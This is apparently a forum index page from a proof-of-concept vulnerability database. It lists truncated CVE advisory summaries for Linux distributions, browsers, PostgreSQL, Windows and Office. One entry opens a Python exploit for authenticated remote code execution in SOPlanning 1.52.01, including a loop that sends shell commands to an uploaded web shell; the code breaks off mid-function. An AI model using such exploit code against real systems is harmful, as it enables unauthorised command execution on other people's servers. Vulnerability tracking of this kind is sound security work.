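?day POC Vulnerability Database
POC vulnerability database covering all CVEs, POCs and ?days from across the web in recent years. It can be connected to the ishack vulnerability scanner through the API; some vulnerabilities are visible to members only.
45,352 topics in this forum
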
Oracle Linux: CVE-2023-28101: ELSA-2023-6518:flatpak security, bug fix, and enhancement update (MODERATE) (Multiple Advisories) Severity 5 CVSS (AV:L/AC:L/Au:N/C:C/I:N/A:N) Published 03/16/2023 Created 11/24/2023 Added 11/22/2023 Modified 11/28/2024 Description Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. In versions prior to 1.10.8, 1.12.8, 1.14.4, and 1.15.4, if an attacker publishes a Flatpak app with elevated permissions, they can hide those permissions from users of the `flatpak(1)` command-line interface by setting other permissions to crafted values that contain non-printable control cha…
- 0 replies
- 52 views

VMware Photon OS: CVE-2022-3294 Severity 7 CVSS (AV:N/AC:H/Au:M/C:C/I:C/A:C) Published 03/01/2023 Created 01/21/2025 Added 01/20/2025 Modified 02/04/2025 Description Users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them. Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections to Pods, retrieve container logs, and more. While Kubernetes already validates the proxying address for Nodes, a bug in kube-apiserver made it possible to bypass this vali…
- 0 replies
- 52 views

SUSE: CVE-2023-23006: SUSE Linux Security Advisory Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 03/01/2023 Created 03/22/2023 Added 03/20/2023 Modified 01/28/2025 Description In the Linux kernel before 5.15.13, drivers/net/ethernet/mellanox/mlx5/core/steering/dr_domain.c misinterprets the mlx5_get_uars_page return value (expects it to be NULL in the error case, whereas it is actually an error pointer). Solution(s) suse-upgrade-cluster-md-kmp-64kb suse-upgrade-cluster-md-kmp-azure suse-upgrade-cluster-md-kmp-default suse-upgrade-cluster-md-kmp-rt suse-upgrade-dlm-kmp-64kb suse-upgrade-dlm-kmp-azure suse-upgrade-dlm-kmp-defa…
- 0 replies
- 52 views

```python
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
# Date: 6th October, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Version: 1.52.01
# Tested on: Ubuntu

import argparse
import requests
import random
import string
import urllib.parse

def command_shell(exploit_url):
    commands = input("soplaning:~$ ")
    encoded_command = urllib.parse.quote_plus(commands)
    command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
    if command_res.status_code == 200:
        print(f"{command_res.text}")
        return
    print(f"Error: An erros occured while running command: {encoded_command}")

def exp…
```
- 0 replies
- 51 views

CentOS Linux: CVE-2023-25358: Important: webkit2gtk3 security and bug fix update (Multiple Advisories) Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/02/2023 Created 05/15/2023 Added 05/15/2023 Modified 01/28/2025 Description A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely. Solution(s) centos-upgrade-webkit2gtk3 centos-upgrade-webkit2gtk3-debuginfo centos-upgrade-webkit2gtk3-debugsource centos-upgrade-webkit2gtk3-devel centos-upgrade-webkit2gtk3-devel-debuginfo centos-upgrade-webkit2gtk3-jsc centos-upgrade-webkit2gtk3-jsc-debuginfo cento…
- 0 replies
- 51 views

Debian: CVE-2023-25358: webkit2gtk, wpewebkit -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/02/2023 Created 03/08/2023 Added 03/07/2023 Modified 01/28/2025 Description A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely. Solution(s) debian-upgrade-webkit2gtk debian-upgrade-wpewebkit References https://attackerkb.com/topics/cve-2023-25358 CVE - 2023-25358 DLA-3124-1 DSA-5240-1 DSA-5241-1
- 0 replies
- 51 views

Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0997 CVE - 2025-0997
- 0 replies
- 51 views

Red Hat: CVE-2022-27672: kernel: AMD: Cross-Thread Return Address Predictions (Multiple Advisories) Severity 4 CVSS (AV:L/AC:M/Au:S/C:C/I:N/A:N) Published 03/01/2023 Created 11/23/2023 Added 11/22/2023 Modified 01/28/2025 Description When SMT is enabled, certain AMD processors may speculatively execute instructions using a target from the sibling thread after an SMT mode switch potentially resulting in information disclosure. Solution(s) redhat-upgrade-kernel redhat-upgrade-kernel-rt References CVE-2022-27672 RHSA-2023:7370 RHSA-2023:7379
- 0 replies
- 51 views

Microsoft Edge Chromium: CVE-2023-1532 Out of bounds read in GPU Video Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 03/27/2023 Added 03/27/2023 Modified 01/28/2025 Description Out of bounds read in GPU Video in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) Solution(s) microsoft-edge-upgrade-latest References https://attackerkb.com/topics/cve-2023-1532 CVE - 2023-1532 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-1532
- 0 replies
- 50 views

Debian: CVE-2023-28487: sudo -- security update Severity 5 CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N) Published 03/16/2023 Created 02/06/2024 Added 02/05/2024 Modified 01/28/2025 Description Sudo before 1.9.13 does not escape control characters in sudoreplay output. Solution(s) debian-upgrade-sudo References https://attackerkb.com/topics/cve-2023-28487 CVE - 2023-28487 DLA-3732-1
- 0 replies
- 50 views

PostgreSQL: CVE-2025-1094: PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation Severity 8 CVSS (AV:N/AC:H/Au:N/C:C/I:C/A:C) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/14/2025 Description Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns. Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal. Similarly, i…
- 0 replies
- 50 views

Red Hat: CVE-2023-28101: flatpak: Metadata with ANSI control codes can cause misleading terminal output (Multiple Advisories) Severity 4 CVSS (AV:N/AC:L/Au:S/C:N/I:P/A:N) Published 03/16/2023 Created 11/09/2023 Added 11/08/2023 Modified 01/28/2025 Description Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. In versions prior to 1.10.8, 1.12.8, 1.14.4, and 1.15.4, if an attacker publishes a Flatpak app with elevated permissions, they can hide those permissions from users of the `flatpak(1)` command-line interface by setting other permissions to crafted values that contain non-printable control cha…
- 0 replies
- 50 views

Huawei EulerOS: CVE-2023-27561: docker-runc security update Severity 7 CVSS (AV:L/AC:M/Au:S/C:C/I:C/A:C) Published 03/03/2023 Created 05/10/2023 Added 05/09/2023 Modified 01/28/2025 Description runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression. Solution(s) huawei-euleros-2_0_sp10-upgrade-docker-runc References https://attackerkb.com/topics/cve-2…
- 0 replies
- 50 views

Debian: CVE-2025-21694: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix softlockup in __read_vmcore (part 2) Since commit 5cbcb62dddf5 ("fs/proc: fix softlockup in __read_vmcore") the number of softlockups in __read_vmcore at kdump time have gone down, but they still happen sometimes. In a memory constrained environment like the kdump image, a softlockup is not just a harmless message, but it can interfere with things like RCU freeing memory, causing the c…
- 0 replies
- 50 views

Debian: CVE-2021-47413: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 05/21/2024 Created 07/31/2024 Added 07/30/2024 Modified 01/30/2025 Description In the Linux kernel, the following vulnerability has been resolved: usb: chipidea: ci_hdrc_imx: Also search for 'phys' phandle When passing 'phys' in the devicetree to describe the USB PHY phandle (which is the recommended way according to Documentation/devicetree/bindings/usb/ci-hdrc-usb2.txt) the following NULL pointer dereference is observed on i.MX7 and i.MX8MM: [1.489344] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000098 [1.4…
- 0 replies
- 49 views

Debian: CVE-2025-21699: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: gfs2: Truncate address space when flipping GFS2_DIF_JDATA flag Truncate an inode's address space when flipping the GFS2_DIF_JDATA flag: depending on that flag, the pages in the address space will either use buffer heads or iomap_folio_state structs, and we cannot mix the two. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2025-21699 CVE - 20…
- 0 replies
- 49 views

Ubuntu: (Multiple Advisories) (CVE-2024-42415): libgsf vulnerabilities Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 10/03/2024 Created 10/12/2024 Added 10/11/2024 Modified 01/28/2025 Description An integer overflow vulnerability exists in the Compound Document Binary File format parser of v1.14.52 of the GNOME Project G Structured File Library (libgsf). A specially crafted file can result in an integer overflow that allows for a heap-based buffer overflow when processing the sector allocation table. This can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. Solution(s)…
- 0 replies
- 49 views

Microsoft Edge Chromium: CVE-2023-1529 Out of bounds memory access in WebHID Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 03/27/2023 Added 03/27/2023 Modified 01/28/2025 Description Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High) Solution(s) microsoft-edge-upgrade-latest References https://attackerkb.com/topics/cve-2023-1529 CVE - 2023-1529 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-1529
- 0 replies
- 48 views

Ubuntu: (CVE-2021-47426): linux vulnerability Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 05/21/2024 Created 11/21/2024 Added 11/19/2024 Modified 02/11/2025 Description In the Linux kernel, the following vulnerability has been resolved: bpf, s390: Fix potential memory leak about jit_data Make sure to free jit_data through kfree() in the error path. Solution(s) ubuntu-upgrade-linux ubuntu-upgrade-linux-aws ubuntu-upgrade-linux-aws-5-4 ubuntu-upgrade-linux-aws-fips ubuntu-upgrade-linux-azure ubuntu-upgrade-linux-azure-5-4 ubuntu-upgrade-linux-azure-fips ubuntu-upgrade-linux-bluefield ubuntu-upgrade-linux-fips ubuntu-upgra…
- 0 replies
- 48 views

Debian: CVE-2021-47617: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 06/20/2024 Created 07/31/2024 Added 07/30/2024 Modified 01/30/2025 Description In the Linux kernel, the following vulnerability has been resolved: PCI: pciehp: Fix infinite loop in IRQ handler upon power fault The Power Fault Detected bit in the Slot Status register differs from all other hotplug events in that it is sticky: It can only be cleared after turning off slot power. Per PCIe r5.0, sec. 6.7.1.8: If a power controller detects a main power fault on the hot-plug slot, it must automatically set its internal main power fault latch [...]. T…
- 0 replies
- 48 views

Ubuntu: USN-6021-1 (CVE-2023-1534): Chromium vulnerabilities Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 05/05/2023 Added 04/17/2023 Modified 01/28/2025 Description Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) Solution(s) ubuntu-upgrade-chromium-browser References https://attackerkb.com/topics/cve-2023-1534 CVE - 2023-1534 USN-6021-1
- 0 replies
- 48 views

Debian: CVE-2025-21697: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Ensure job pointer is set to NULL after job completion After a job completes, the corresponding pointer in the device must be set to NULL. Failing to do so triggers a warning when unloading the driver, as it appears the job is still active. To prevent this, assign the job pointer to NULL after completing the job, indicating the job has finished. Solution(s) debian-upgrade-lin…
- 0 replies
- 48 views

Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Severity 6 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Solution(s) microsoft-windows-windows_10-1507-kb5052040 microsoft-windows-windows_10-1607-kb5052006 microsoft-windows-windows_10-1809-kb5052000 microsoft-windows-windows_10-21h2-kb5051974 microsoft-windows-windows_10-22h2-kb5051974 microsoft-windows-windows_11-22h2-kb50…
- 0 replies
- 48 views

SUSE: CVE-2023-1195: SUSE Linux Security Advisory Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 03/16/2023 Created 03/22/2023 Added 03/20/2023 Modified 01/28/2025 Description A use-after-free flaw was found in reconn_set_ipaddr_from_hostname in fs/cifs/connect.c in the Linux kernel. The issue occurs when it forgets to set the free pointer server->hostname to NULL, leading to an invalid pointer request. Solution(s) suse-upgrade-kernel-rt References https://attackerkb.com/topics/cve-2023-1195 CVE - 2023-1195
- 0 replies
- 48 views

Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Severity 6 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Solution(s) office-click-to-run-upgrade-latest References https://attackerkb.com/topics/cve-2025-21397 CVE - 2025-21397
- 0 replies
- 48 views